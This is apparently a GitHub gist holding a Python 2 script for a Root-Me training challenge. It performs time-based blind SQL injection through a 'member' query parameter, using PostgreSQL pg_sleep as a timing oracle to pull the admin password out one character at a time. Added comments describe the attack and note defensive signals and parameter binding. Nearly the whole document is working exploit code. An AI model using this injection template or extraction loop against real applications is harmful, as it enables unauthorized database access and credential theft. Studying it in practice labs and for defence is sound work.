@veeeeeeeeeee
Last active November 18, 2017 08:15
Blind injection
#!/usr/bin/env python
import requests
# Target of every request below: a Root-Me training challenge (web-serveur/ch40).
# The injection is carried in the `member` query parameter of this one URL.
baseurl = 'http://challenge01.root-me.org/web-serveur/ch40/'
# Time-based blind template: the boolean substituted for `%s` decides whether
# the backend sleeps 15 s (pg_sleep) or not, so response delay is the only oracle.
# Defender view: pg_sleep() reaching the database from a web handler, and bursts
# of requests that differ only in one parameter, are the observable signal;
# binding `member` as a query parameter removes the injection point entirely.
inject = '1; select case when %s then pg_sleep(15) else pg_sleep(0) end--'
# Oracle conditions that get formatted into `inject`:
#   cond1 -- "character at position %d of admin's password equals chr(%d)";
#            format args are (char_code, position), see password().
#   cond2 -- "a table named users exists" (the name is spelled out with chr()
#            calls: 117,115,101,114,115 = u,s,e,r,s); used once by test().
#   cond3 -- "admin's password is longer than %d characters"; used by length().
cond1 = '(chr(%d) = substr((select password from users where username = $$admin$$), %d, 1))'
cond2 = '((select chr(117)||chr(115)||chr(101)||chr(114)||chr(115)) in (select table_name from information_schema.tables))'
cond3 = '(%d < (select char_length((select password from users where username = $$admin$$))))'
#r = requests.get(baseurl, params=payload);
def test():
    """Send the `cond2` probe once and print the request URL and elapsed time.

    The result is read off the printed delay by the person running the
    script (Python 2 print statements); the function itself always returns 0.
    """
    payload = {'action' : 'member', 'member' : inject % cond2}
    r = requests.get(baseurl, params=payload)
    print r.url
    print r.elapsed.total_seconds()
    return 0
def length():
    """Probe whether admin's password is longer than 12 characters (cond3 % 12).

    Prints the request URL and the elapsed time; the caller judges from the
    delay. Always returns 0 -- nothing is computed from the timing here.
    """
    cond = cond3 % 12
    payload = {'action' : 'member', 'member' : inject % cond}
    r = requests.get(baseurl, params=payload)
    print r.url
    print r.elapsed.total_seconds()
    return 0
#45
def password():
    """Recover admin's password one character at a time from the timing oracle.

    For positions 1..13 it tries character codes 32..176 in order until one
    request takes longer than 2.4 s, appends that character to `col`, prints
    the prefix so far and moves to the next position. There is no return
    statement, so the trailing `print password()` prints None.

    NOTE(review): the pasted source lost its indentation; the nesting below
    (in particular `j = j+1` inside the while loop) is the only reading under
    which the loop terminates -- confirm against the original.
    """
    col = ""
    for i in range(1, 14):
        print 'i=' + str(i)
        j = 32           # first candidate is the space character
        loop = True
        while j <= 176 and loop:
            # '(chr(%d) = substr((select table_name from information_schema.tables where table_schema not in ($$information_schema$$, $$pg_catalog$$)), %d, 1))'
            cond = cond1 % (j, i)
            payload = {'action' : 'member', 'member' : inject % cond}
            # No timeout is passed, so a stalled request blocks the scan.
            r = requests.get(baseurl, params=payload)
            #print r.elapsed.total_seconds()
            # The injected sleep is 15 s but the match threshold is 2.4 s: any
            # delay above 2.4 s, whatever its cause, is taken as a match.
            if r.elapsed.total_seconds() > 2.4:
                loop = False
                col = col + chr(j)
                #print j
                print col
            j = j+1
#print length()
# Script entry point: only password() runs; length() and test() are the
# one-off probes left commented out above and below.
print password()
#print test()